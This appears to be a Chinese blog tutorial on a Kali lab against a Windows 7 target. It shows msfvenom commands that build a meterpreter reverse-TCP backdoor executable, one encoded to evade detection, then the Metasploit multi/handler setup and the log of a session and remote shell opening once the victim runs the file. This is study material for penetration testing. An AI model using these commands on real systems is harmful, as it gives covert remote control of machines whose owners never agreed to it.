zoukankan      html  css  js  c++  java
  • Kali系列之multi/handler(渗透win7)

    环境
    靶机 192.168.137.133
    kali 192.168.137.135

    步骤+

    生成后门
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.137.135 LPORT=50000 -f exe -o openme.exe
    
    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b 'x00' lhost=192.168.137.135 lport=4433 -f exe > payload.exe

    使用/multi/handler模块
    root@kali:~# msfconsole 
                                                      
    
             .                                         .
     .
    
          dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
           '   dB'                     BBP
        dB'dB'dB' dBBP     dBP     dBP BB
       dB'dB'dB' dBP      dBP     dBP  BB
      dB'dB'dB' dBBBBP   dBP     dBBBBBBB
    
                                       dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
              .                  .                  dB' dBP    dB'.BP
                                 |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                               --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                                 |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP
    
                                                                        .
                    .
            o                  To boldly go where no
                                shell has gone before
    
    
           =[ metasploit v4.16.30-dev                         ]
    + -- --=[ 1722 exploits - 986 auxiliary - 300 post        ]
    + -- --=[ 507 payloads - 40 encoders - 10 nops            ]
    + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
    
    msf > use exploit/multi/handler
    设置本地ip与端口
    msf exploit(multi/handler) > set lhost 192.168.137.135
    lhost => 192.168.137.135
    msf exploit(multi/handler) > set lport 50000
    lport => 50000
    启动后门攻击监听
    msf exploit(multi/handler) > exploit -z -j

    情况+

    当靶机点击后门程序openme.exe后,kali监听到session, 进行拿权

    msf exploit(multi/handler) > [*] Sending stage (179779 bytes) to 192.168.137.139
    [*] Meterpreter session 1 opened (192.168.137.135:50000 -> 192.168.137.139:49159) at 2018-04-13 22:18:04 +0800
    sessions 
    
    Active sessions
    ===============
    
      Id  Name  Type                     Information                         Connection
      --  ----  ----                     -----------                         ----------
      1         meterpreter x86/windows  chenglee-PCchenglee @ CHENGLEE-PC  192.168.137.135:50000 -> 192.168.137.139:49159 (192.168.137.139)
    
    msf exploit(multi/handler) > sessions -i 1
    [*] Starting interaction with 1...
    控制靶机shell
    meterpreter > shell
    Process 3028 created.
    Channel 1 created.
    Microsoft Windows [�汾 6.1.7601]
    ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
    
    C:UserschengleeDesktop>ls
    

    演示

    kali

    靶机

    好东西做个分享

    D7经典脚本[multi/handler]

    做个笔记。

  • 相关阅读:
    HDU
    HDU
    (4)数据--相似性与相异性
    (3)数据--操作
    (2)数据--基本概念
    五、按生命周期划分数据(二)
    五、常用数据类型(一)
    四、坏耦合的原因与解耦(三)
    四、强化耦合(二)
    四、初识耦合(一)
  • 原文地址:https://www.cnblogs.com/chenglee/p/8820406.html
Copyright © 2011-2022 走看看